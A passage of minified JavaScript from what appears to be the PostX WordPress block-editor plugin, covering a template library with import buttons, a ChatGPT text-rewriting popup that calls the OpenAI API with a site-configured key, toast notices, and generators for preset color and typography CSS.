"+(["header","footer"].includes(e.builder_type)?"ultp_hf":""),href:Y||$?"https://postxkit.wpxpo.com/"+($||["header","footer"].includes(e.builder_type)?e.live:e.live+"/postx_"+("archive"==e.builder_type?e.archive_type:e.builder_type)):`https://www.wpxpo.com/postx/patterns/#demoid${e.ID}`,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-item-list-info"},(0,o.createElement)("div",{className:"ultp-list-info"},C?Z?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",null,e.name),(0,o.createElement)("div",{className:"parent"},e.parent," ")):(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",null,e.title),(0,o.createElement)("div",{className:"parent"},e?.templates?.length+" templates"," ")):(0,o.createElement)("span",null,e.name,(Y||$)&&(0,o.createElement)("div",{className:"parent"},e.parent," "))),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{k(e.ID,Q?.includes(e.ID)?"remove":"")}},i.ZP[Q?.includes(e.ID)?"love_solid":"love_line"]),C?Z&&(0,o.createElement)(o.Fragment,null,e.pro&&!H.active?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=starter-site-upgrade&utm_campaign=postx-dashboard#pricing",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):"ultp_builder"!==e.type&&(0,o.createElement)("span",{onClick:()=>X("https://postxkit.wpxpo.com/"+e.live,e.ID,e.pro),className:"ultp-btns ultp-btn-import"},!(L&&I==e.ID)&&i.ZP.arrow_down_line,__("Import","ultimate-post"),L&&I==e.ID&&(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}))):e.pro&&!H.active?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:`https://www.wpxpo.com/postx/${Y?`?utm_source=db-postx-builder&utm_medium=${H?.archive}-buider-library&utm_campaign=postx-dashboard`:"?utm_source=db-postx-editor&utm_medium=pattern-upgrade&utm_campaign=postx-dashboard"}#pricing`,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):(0,o.createElement)("span",{onClick:()=>{Y||$?X("https://postxkit.wpxpo.com/"+e.live,e.ID,e.pro):v(e.ID,e.pro)},className:"ultp-btns ultp-btn-import"},!(L&&I==e.ID)&&i.ZP.arrow_down_line,__("Import","ultimate-post"),L&&I==e.ID&&(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}))))),(0,o.createElement)("div",{className:(C&&!Y&&$?"ultp-starter-shape":"ultp-shape-hide")+" "})))))):(0,o.createElement)(o.Fragment,null,U?(0,o.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col3 skeletonOverflow"},Array(25).fill(1).map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:400,unit2:"px"}})),(0,o.createElement)("div",{className:"ultp-item-list-info"},(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist"},(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})),(0,o.createElement)(n.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:25,unit2:"px",br:2}}))))))):(0,o.createElement)("span",{className:"ultp-image-rotate"},__("No Data found…","ultimate-post"))))))}},8949:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(40619);const a=e=>{const{type:t,size:l,loop:a,unit:i,c_s:n,classes:r}=e,s=()=>{let e={};switch(t){case"image":case"circle":e={width:l?l+"px":"300px",height:l?l+"px":"300px"};break;case"title":e={width:`${l||"100"}${i||"%"}`};break;case"button":e={width:l?l+"px":"90px"};break;case"custom_size":e={width:`${n.size1?n.size1:"100"}${n.unit1?n.unit1:"%"}`,height:`${n.size2?n.size2:"20"}${n.unit2?n.unit2:"px"}`,borderRadius:n.br?n.br+"px":"0px"}}return e};return(0,o.createElement)(o.Fragment,null,a?(0,o.createElement)(o.Fragment,null,Array(parseInt(a)).fill("1").map(((e,l)=>(0,o.createElement)("div",{key:l,className:`ultp_skeleton__${t} ultp_frequency loop ${r||""}`,style:s()})))):(0,o.createElement)("div",{className:`ultp_skeleton__${t} ultp_frequency ${r||""}`,style:s()}))}},90356:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(42413);const{__}=wp.i18n,a=({delay:e,toastMessages:t,setToastMessages:l})=>{const[a,i]=(0,o.useState)(!0),[n,r]=(0,o.useState)("show");return(0,o.useEffect)((()=>{const t=setTimeout((()=>{i(!1),r(""),l({state:!1,status:""})}),e);return()=>clearTimeout(t)}),[e]),(0,o.createElement)("div",{className:"toast"},a&&t.status&&t.messages.length>0&&(0,o.createElement)("div",{className:"toastMessages"},t.messages.map(((e,a)=>(0,o.createElement)("span",{key:`toast_${Date.now().toString()}_${a}`},(0,o.createElement)("div",{className:`toaster ${n}`},(0,o.createElement)("span",null,"error"==t.status?(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,o.createElement)("circle",{cx:"26",cy:"26",r:"25",fill:"none",className:"circle cross"}),(0,o.createElement)("path",{fill:"none",d:"M 12,12 L 40,40 M 40,12 L 12,40",className:"check"})):(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,o.createElement)("circle",{className:"circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,o.createElement)("path",{className:"check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,o.createElement)("span",{className:"itmCenter"},e),(0,o.createElement)("span",{className:"itmLast",onClick:()=>(e=>{let o=[...t.messages];o=o.filter(((t,l)=>l!==e)),l({...t,messages:o})})(a)},__("Close","ultimate-post"))))))))}},25364:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294);l(19552);const{__}=wp.i18n,{useState:a,useEffect:i,useRef:n}=wp.element,{rawHandler:r}=wp.blocks,{store:s}=wp.blockEditor,p=e=>{const{fromEditPostToolbar:t,onChange:l,value:p}=e,c=n(),[u,d]=a(""),[m,g]=a(""),[y,b]=a(""),[v,h]=a(""),[f,k]=a(""),[w,x]=a(""),[T,_]=a(e.isShow||!1),[C,E]=a(p?.text?p.start==p.end?p.text:p.text.substring(p.start,p.end):""),S=e=>{27===e.keyCode&&(document.querySelector(".ultp-builder-modal").remove(),_(!1))};i((()=>(document.addEventListener("keydown",S),()=>document.removeEventListener("keydown",S))),[]);const P=(e,t)=>{const l=e.replace("%s",C);f?h("There is an ongoing process. Kindly hold on for a moment."):(async(e,t)=>{let l="",o="";k(t);try{let t="https://api.openai.com/v1/chat/completions";const a=ultp_data.settings.chatgpt_secret_key,i=ultp_data.settings.chatgpt_model,n=ultp_data.settings.chatgpt_response_time||35,r=ultp_data.settings.chatgpt_max_tokens||200;let s="";if("gpt-3.5-turbo"==i||"gpt-4"==i?s={model:i,messages:[{role:"user",content:e}]}:"text-davinci-002"!=i&&"text-davinci-003"!=i||(t="https://api.openai.com/v1/completions",s={model:i,prompt:e,max_tokens:r}),s){const e=await fetch(t,{method:"POST",headers:{"Content-Type":"application/json",Authorization:`Bearer ${a}`},timeout:n,body:JSON.stringify(s)}),r=await e.json();r?.choices?.length>0&&(r?.choices[0]?.message?.content||r?.choices[0]?.text)?o="text-davinci-002"==i||"text-davinci-003"==i?r.choices[0].text:r.choices[0].message.content:r?.error&&(l="invalid_api_key"==r?.error.code?__("Your OpenAI API Secret Key is invalid. Please save a valid key.","ultimate-post"):"model_not_found"==r?.error?.code&&r?.error?.message?.includes("gpt-4")?__("You are not eligible to use GPT-4 model. Please contact OpenAI to get the access.","ultimate-post"):__("Due to some error, we could not get response from OpenAI server. Please try again.","ultimate-post"))}}catch(e){l=__("Due to some error, we could not get response from OpenAI server. Please try again.","ultimate-post")}h(l),l||E(o),k("")})(l,t)},L=()=>{let e=c.current.value;e?(m&&(e+=" in "+m+" style"),u&&(e+=" using "+u+" tone"),y&&(e+=" translate in "+y+" language"),P(e,"extra")):h("No prompt detected.")},I=e=>(0,o.createElement)("div",{className:"ultp-btn-item"},(0,o.createElement)("select",{value:"tone"==e.loading?u:"style"==e.loading?m:y,onChange:t=>{switch(C&&P(e.prompt.replace("%t",t.target.value),e.loading),e.loading){case"tone":d(t.target.value);break;case"style":g(t.target.value);break;case"language":b(t.target.value)}}},e.options.map(((e,t)=>(0,o.createElement)("option",{key:t,value:e.includes("-")?"":e.toLowerCase()},e)))),B(e.loading)),B=e=>f==e?(0,o.createElement)("span",{className:"chatgpt-loader"}):"";return(0,o.createElement)(o.Fragment,null,T&&(0,o.createElement)("div",{className:"ultp-builder-modal-shadow ultp-chatgpt-popup"},(0,o.createElement)("div",{className:"ultp-popup-wrap"},(0,o.createElement)("div",{className:"ultp-popup-header"},(0,o.createElement)("div",{className:"ultp-popup-filter-title"},(0,o.createElement)("div",{className:"ultp-popup-filter-image-head"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/addons/ChatGPT.svg"}),(0,o.createElement)("span",null,__("ChatGPT","ultimate-post"))),(0,o.createElement)("div",{className:"ultp-popup-filter-sync-close"},(0,o.createElement)("button",{className:"ultp-btn-close",onClick:()=>(()=>{const e=document.querySelector(".ultp-builder-modal");e.length>0&&e.remove(),_(!1)})(),id:"ultp-btn-close"},(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}))))),(0,o.createElement)("div",{className:"ultp-chatgpt-wrap "+(ultp_data.settings.chatgpt_secret_key?"":"ultp-chatgpt-nokey")},(0,o.createElement)("div",{className:"ultp-chatgpt-input-container"},(0,o.createElement)("div",{className:"ultp-chatgpt-popup-content"},!ultp_data.settings.chatgpt_secret_key&&(0,o.createElement)("div",{className:"ultp-chatgpt-api-warning"},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"27.3",height:"24"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:"a"},(0,o.createElement)("path",{fill:"#ffa62c",d:"M0 0h27v24H0z"}))),(0,o.createElement)("g",{clipPath:"url(#a)"},(0,o.createElement)("path",{fill:"#ffa62c",d:"M27 21 15 0a1 1 0 0 0-3 0L0 21a1 1 0 0 0 1 2h25a1 1 0 0 0 1-2m-12-2a1 1 0 1 1 0-1 1 1 0 0 1 0 1m0-5a1 1 0 1 1-3 0V8a1 1 0 0 1 3 0Z"})))," ","Apply"," ",(0,o.createElement)("a",{href:"https://platform.openai.com/account/api-keys",target:"blank"}," ","API key"," ")," ","to use ChatGPT"),v&&(0,o.createElement)("div",{className:"ultp-error-notice"},v),C?(0,o.createElement)("textarea",{type:"text",onChange:e=>E(e.target.value),value:C}):(0,o.createElement)("div",{className:"ultp-chatgpt-search"},(0,o.createElement)("input",{ref:c,type:"text",value:w,placeholder:"Ask Anything",onChange:e=>x(e.target.value),onKeyDown:e=>{"Enter"!==e.key||f||L()}}),(0,o.createElement)("button",{className:"button ultp-ask-chatgpt-button",onClick:e=>{f||L()}},f?B("extra"):(0,o.createElement)("i",{className:"dashicons dashicons-search"})," ","Ask ChatGPT")),(0,o.createElement)("div",{className:"ultp-btn-items"},C&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('rewrite this sentences "%s"',"rewrite")},"Rewrite"," ",B("rewrite")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('improve this sentences "%s"',"improve")},"Improve"," ",B("improve")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make shorter this sentences "%s"',"shorter")},"Make Shorter"," ",B("shorter")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make longer this sentences "%s"',"longer")},"Make Longer"," ",B("longer")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('summarize this sentences "%s"',"summarize")},"Summarize"," ",B("summarize")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Write a introduction of this sentences "%s"',"introduction")},"Introduction"," ",B("introduction")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Write a conclusion of this sentences "%s"',"conclusion")},"Conclusion"," ",B("conclusion")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Convert to Passive Voice of this sentences "%s"',"passive")},"Convert to Passive Voice"," ",B("passive")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('Convert to Active Voice of this sentences "%s"',"active")},"Convert to Active Voice"," ",B("active")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make a paraphrase of this sentences "%s"',"phrase")},"Paraphrase"," ",B("phrase")),(0,o.createElement)("div",{className:"ultp-btn-item",onClick:()=>P('make a outline of this sentences "%s"',"outline")},"Outline"," ",B("outline"))),(0,o.createElement)(I,{loading:"style",prompt:'write this sentences using %t style "%s"',options:["- Writing Style -","Descriptive","Expository","Narrative","Normal","Persuasive"]}),(0,o.createElement)(I,{loading:"tone",prompt:'write this sentences using %t tone "%s"',options:["- Writing Tone -","Assertive","Cooperative","Curious","Encouraging","Formal","Friendly","Informal","Optimistic","Surprised","Worried"]}),(0,o.createElement)(I,{loading:"language",prompt:'translate this sentences in %t language "%s"',options:["- Writing Language -","Arabic","Bengali","English","French","German","Hindi","Italian","Indonesian","Japanese","Javanese","Korean","Mandarin Chinese","Marathi","Norwegian","Polish","Portuguese","Punjabi","Russian","Spanish","Telugu","Thai","Turkish","Urdu","Vietnamese","Wu Chinese"]})),C&&(0,o.createElement)("div",{className:"ultp-center"},(0,o.createElement)("span",{onClick:()=>{_(!1),(e=>{if(t){const t=wp.blocks.createBlock("core/html",{content:e});wp.data.dispatch("core/block-editor").insertBlock(t,wp.data.select("core/block-editor").getBlockCount()),wp.data.dispatch(s).replaceBlock(t.clientId,r({HTML:t.attributes.content}))}else{const t=p.start==p.end?e:p.text.substring(0,p.start)+e+p.text.substring(p.end);l(wp.richText.create({text:t}))}})(C)},className:"ultp-btn ultp-btn-primary"},(0,o.createElement)("span",{className:"dashicons dashicons-arrow-down-alt"})," ",__("Import","ultimate-post")),(0,o.createElement)("span",{onClick:()=>E(""),className:"ultp-btn ultp-btn-transparent"},(0,o.createElement)("span",{className:"dashicons dashicons-plus"})," ",__("New Prompt","ultimate-post")))))))))}},5207:(e,t,l)=>{"use strict";var o=l(67294),a=l(87763),i=l(25364);const{BlockControls:n}=wp.blockEditor,{ToolbarButton:r}=wp.components,{render:s}=wp.element,{registerFormatType:p}=wp.richText;"true"==ultp_data.settings.ultp_chatgpt&&p("ultimate-post/chatgpt",{title:"ChatGPT",tagName:"span",className:"ultp-chatgpt",edit:e=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n,null,(0,o.createElement)(r,{icon:a.Z.chatgpt,label:"ChatGPT",className:"components-toolbar",onClick:()=>{const t=document.createElement("div");t.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(t),s((0,o.createElement)(i.Z,{isShow:!0,value:e.value,onChange:t=>e.onChange(t),fromEditPostToolbar:!1}),t),document.body.classList.add("ultp-popup-open")}})))})},60448:(e,t,l)=>{"use strict";l.d(t,{AJ:()=>i,Jj:()=>c,MR:()=>u,RK:()=>r,_n:()=>p,cC:()=>y,hN:()=>s,je:()=>g,nl:()=>d,sR:()=>n,x2:()=>a,xP:()=>m});var o=l(32030);const{__}=wp.i18n,a=(e,t,l,o)=>{wp.apiFetch({path:"/ultp/v1/postx_presets",method:"POST",data:{type:e,key:t,data:l}}).then((a=>{a.success&&("set"==e&&c(t,l),o&&o(a))}))},i=(e,t="",l=!1)=>{if("typoStacks"==e)return[[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:600,family:"Roboto Slab"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:600,family:"Jost"},{type:"sans-serif",weight:400,family:"Jost"}],[{type:"display",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:700,family:"Arvo"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:700,family:"Merriweather"},{type:"sans-serif",weight:400,family:"Merriweather"}],[{type:"sans-serifs",weight:500,family:"Oswald"},{type:"sans-serif",weight:400,family:"Source Sans Pro"}],[{type:"display",weight:400,family:"Abril Fatface"},{type:"sans-serif",weight:400,family:"Poppins"}],[{type:"serif",weight:700,family:"Cardo"},{type:"sans-serif",weight:400,family:"Inter"}]];if("multipleTypos"==e)return{Body_and_Others_typo:["body_typo","paragraph_1_typo","paragraph_2_typo","paragraph_3_typo"],Heading_typo:["heading_h1_typo","heading_h2_typo","heading_h3_typo","heading_h4_typo","heading_h5_typo","heading_h6_typo"]};if("presetTypoKeys"==e)return["Heading_typo","Body_and_Others_typo"];if("colorStacks"==e)return[["#f4f4ff","#dddff8","#B4B4D6","#3323f0","#4a5fff","#1B1B47","#545472","#262657","#10102e"],["#ffffff","#f7f4ed","#D6D1B4","#fab42a","#f4cd4e","#3B3118","#6F6C53","#483d1f","#29230f"],["#ffffff","#eaf7ea","#C2DBBF","#3b9138","#54a757","#1E381A","#586E56","#23411f","#162c11"],["#fdf7ff","#eadef5","#C1B4D6","#8749d0","#995ede","#301B42","#635472","#38204e","#231133"],["#fffcfc","#fce5ec","#D6B4BC","#f01f50","#ff5878","#431B23","#72545B","#4d2029","#36141b"],["#ffffff","#ecf3f8","#B4C2D6","#2890e8","#6cb0f4","#1D3347","#4B586C","#2c4358","#10202b"],["#f8f3ed","#f2e2d0","#D6C4B4","#dd8336","#f09f4d","#3D2A1D","#6E5F52","#483324","#2e1e11"],["#ffffff","#faf0f4","#D6B4CF","#d948a2","#e56ab5","#401B2E","#725468","#4e2239","#290e1d"],["#f2f7ea","#e1e6c4","#D2DBBF","#829d46","#a1c36b","#30371A","#5F6551","#38401f","#242e10"],["#ffffff","#e9f7f3","#B5D1C7","#3cbe8b","#59d5a5","#1C3D3F","#46675E","#20484b","#153234"]];if("presetColorKeys"==e)return["Base_1_color","Base_2_color","Base_3_color","Primary_color","Secondary_color","Tertiary_color","Contrast_3_color","Contrast_2_color","Contrast_1_color"];if("presetGradientKeys"==e)return["Cold_Evening_gradient","Purple_Division_gradient","Over_Sun_gradient","Morning_Salad_gradient","Fabled_Sunset_gradient"];if("styleCss"==e){let e=":root { ";return Object.keys(t).forEach(((o,a)=>{if(!["rootCSS","globalColorCSS"].includes(o)){const a=o,i=t[o]?.hasOwnProperty("openColor")?"color"==t[o].type?t[o].color:t[o].gradient:t[o]||l||"";e+=`--postx_preset_${a}: ${i}; `}})),e+=" }",e}if("typoCSS"==e){const e=i("multipleTypos");let a="",n=":root { ";const r=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"];return Object.keys(t).forEach(((i,s)=>{const p=t[i],c=!![...e.Body_and_Others_typo,...e.Heading_typo].includes(i);if(!["rootCSS","presetTypoCSS"].includes(i)&&"object"==typeof p&&Object.keys(p).length){const e=!r.includes(p.family),t=l?ultp_dashboard_pannel:ultp_data;!((!t?.settings?.hasOwnProperty("disable_google_font")||"yes"==t?.settings.disable_google_font)&&t?.settings?.hasOwnProperty("disable_google_font"))&&e&&p.family&&!p.family.includes("--postx_preset")&&!a.includes(p.family.replace(" ","+")+":")&&void 0!==o.Z&&(a+="@import url('https://fonts.googleapis.com/css?family="+p.family.replace(" ","+")+":"+(o.Z?.filter((e=>e.n==p.family))[0]?.v||[]).join(",")+"'); "),c||(n+=p.family?`--postx_preset_${i}_font_family: ${p.family}; `:"",n+=p.family?`--postx_preset_${i}_font_family_type: ${p.type||"sans-serif"}; `:"",n+=p.weight?`--postx_preset_${i}_font_weight: ${p.weight}; `:"",n+=p.style?`--postx_preset_${i}_font_style: ${p.style}; `:"",n+=p.decoration?`--postx_preset_${i}_text_decoration: ${p.decoration}; `:"",n+=p.transform?`--postx_preset_${i}_text_transform: ${p.transform}; `:"",n+=p.spacing?.lg?`--postx_preset_${i}_letter_spacing_lg: ${p.spacing.lg}${p.spacing.ulg||"px"}; `:"",n+=p.spacing?.sm?`--postx_preset_${i}_letter_spacing_sm: ${p.spacing.sm}${p.spacing.usm||"px"}; `:"",n+=p.spacing?.xs?`--postx_preset_${i}_letter_spacing_xs: ${p.spacing.xs}${p.spacing.uxs||"px"}; `:""),n+=p.size?.lg?`--postx_preset_${i}_font_size_lg: ${p.size.lg}${p.size.ulg||"px"}; `:"",n+=p.size?.sm?`--postx_preset_${i}_font_size_sm: ${p.size.sm}${p.size.usm||"px"}; `:"",n+=p.size?.xs?`--postx_preset_${i}_font_size_xs: ${p.size.xs}${p.size.uxs||"px"}; `:"",n+=p.height?.lg?`--postx_preset_${i}_line_height_lg: ${p.height.lg}${p.height.ulg||"px"}; `:"",n+=p.height?.sm?`--postx_preset_${i}_line_height_sm: ${p.height.sm}${p.height.usm||"px"}; `:"",n+=p.height?.xs?`--postx_preset_${i}_line_height_xs: ${p.height.xs}${p.height.uxs||"px"}; `:""}})),n+="}",a+n}if("font_load"==e){let e="";const o=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],a=l?ultp_dashboard_pannel:ultp_data,i=!((!a.settings?.hasOwnProperty("disable_google_font")||"yes"==a.settings.disable_google_font)&&a.settings?.hasOwnProperty("disable_google_font"));if("object"==typeof t&&Object.keys(t).length){const l=!o.includes(t.family);i&&l&&t.family&&(e+="@import url('https://fonts.googleapis.com/css?family="+t.family.replace(" ","+")+":"+t.weight+"'); ")}return e}if("font_load_all"==e){const e=["Roboto","Roboto Slab","Jost","Arvo","Merriweather","Oswald","Abril Fatface","Cardo","Source Sans Pro","Poppins","Inter"],t=["400,500","600","400,600","700","400,700","500","400","700","400","400","400"];let o="";const a=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],i=l?ultp_dashboard_pannel:ultp_data,n=!((!i.settings?.hasOwnProperty("disable_google_font")||"yes"==i.settings.disable_google_font)&&i.settings?.hasOwnProperty("disable_google_font"));return e.forEach(((e,l)=>{const i=!a.includes(e);n&&i&&e&&(o+="@import url('https://fonts.googleapis.com/css?family="+e.replace(" ","+")+":"+t[l]+"'); ")})),o}if("bgCSS"==e){let e={};const l="object"==typeof t?{...t}:{};if("color"==l.type)e.backgroundColor=l.color;else if("gradient"==l.type&&l.gradient){let t=l.gradient;"object"==typeof l.gradient&&(t="linear"==l.gradient.type?"linear-gradient("+l.gradient.direction+"deg, "+l.gradient.color1+" "+l.gradient.start+"%,"+l.gradient.color2+" "+l.gradient.stop+"%);":"radial-gradient( circle at "+l.gradient.radial+" , "+l.gradient.color1+" "+l.gradient.start+"%,"+l.gradient.color2+" "+l.gradient.stop+"%);"),e.backgroundImage=t}else if("image"==l.type){var a;(l.fallbackColor||l.color)&&(e.backgroundColor=null!==(a=l.fallbackColor)&&void 0!==a?a:l.color),l.image&&(e.backgroundImage='url("'+l.image+'")',l.position&&(e.backgroundPositionX=100*l.position.x+"%",e.backgroundPositionY=100*l.position.y+"%"),l.attachment&&(e.backgroundAttachments=l.attachment),l.repeat&&(e.backgroundRepeat=l.repeat),l.size&&(e.backgroundSize=l.size))}else"video"==l.type&&l.fallback&&(e.backgroundImage='url("'+l.fallback+'")',e.backgroundSize="cover",e.backgroundPosition="50% 50%");return e}if("globalCSS"==e){let e=`:root {\n            --preset-color1: ${t.presetColor1||"#037fff"}\n            --preset-color2: ${t.presetColor2||"#026fe0"}\n            --preset-color3: ${t.presetColor3||"#071323"}\n            --preset-color4: ${t.presetColor4||"#132133"}\n            --preset-color5: ${t.presetColor5||"#34495e"}\n            --preset-color6: ${t.presetColor6||"#787676"}\n            --preset-color7: ${t.presetColor7||"#f0f2f3"}\n            --preset-color8: ${t.presetColor8||"#f8f9fa"}\n            --preset-color9: ${t.presetColor9||"#ffffff"}\n        }`;return t.enablePresetColorCSS&&(e+="\n            html body.postx-admin-page .editor-styles-wrapper,\n            html body.postx-admin-page .editor-styles-wrapper p,\n            html body.postx-page,\n            html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                color: var(--postx_preset_Contrast_2_color); \n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6 \n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                color: var(--postx_preset_Contrast_1_color);\n            }\n            ",t.gbbodyBackground.openColor&&(e+=`\n                    html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n                    html body.postx-admin-page.block-editor-page.post-content-style-boxed .editor-styles-wrapper::before,\n                    html.colibri-wp-theme body.postx-page,\n                    body.block-editor-iframe__body\n                    { ${(e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var l;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(l=e.fallbackColor)&&void 0!==l?l:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}return t})(t.gbbodyBackground)} }\n                `)),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h1,\n            body.block-editor-iframe__body h1\n            { \n           